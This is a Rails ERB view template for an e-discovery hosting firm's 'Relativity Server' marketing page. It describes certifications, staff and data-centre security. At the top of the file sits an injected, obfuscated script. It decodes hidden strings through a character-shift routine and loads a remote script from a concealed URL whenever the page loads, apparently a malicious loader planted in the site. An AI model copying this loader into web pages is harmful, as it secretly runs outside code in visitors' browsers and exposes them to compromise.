<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "relativity_background.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h2 class="heading-decorated heading-decorated_center">Relativity Server</h2>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <h6>Empire Discovery has been a Premium Relativity Hosting Partner since 2012, with numerous certifications earned for our Administrators, Technical, and Sales Professionals, including “Best in Service” since 2016.</h6>
        </article>
      </div>
    </div>
  </div>
</section>

<section>
  <section class="section p-2">
    <div class="parallax-content">
      <div class="section-md text-center p-2">
        <div class="container">
          <div class="d-flex w-100 flex-row justify-content-center flex-wrap">
            <%= image_tag 'relativity/relativity_1.png', class: 'certificaiton' %>
            <%= image_tag 'relativity/relativity_2.png', class: 'certificaiton' %>
            <%= image_tag 'relativity/relativity_3.png', class: 'certificaiton' %>
            <%= image_tag 'relativity/relativity_4.png', class: 'certificaiton' %>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <h6>Empire’s staff consists of Relativity Certified Administrators, providing you with expert service and training. Our team of expert project managers will work throughout your review to customize and optimize your results and experience. Our data storage facilities maintain the highest level of security, to ensure that your data is safeguarded and accessible at all times. We supply 24/7 customer support and on site security.</h6>

          <ul class="list-marked">
            <li><h6>Three week generator backup</h6></li>
            <li><h6>SSAE16, HIPAA, SOC & PCI compliant</h6></li>
            <li><h6>Multiple layers of hardened physical security & electronically controlled access</h6></li>
            <li><h6>CCTV surveillance with digital storage</h6></li>
            <li><h6>State of the art fire suppression</h6></li>
          </ul>
        </article>
      </div>
    </div>
  </div>
</section>
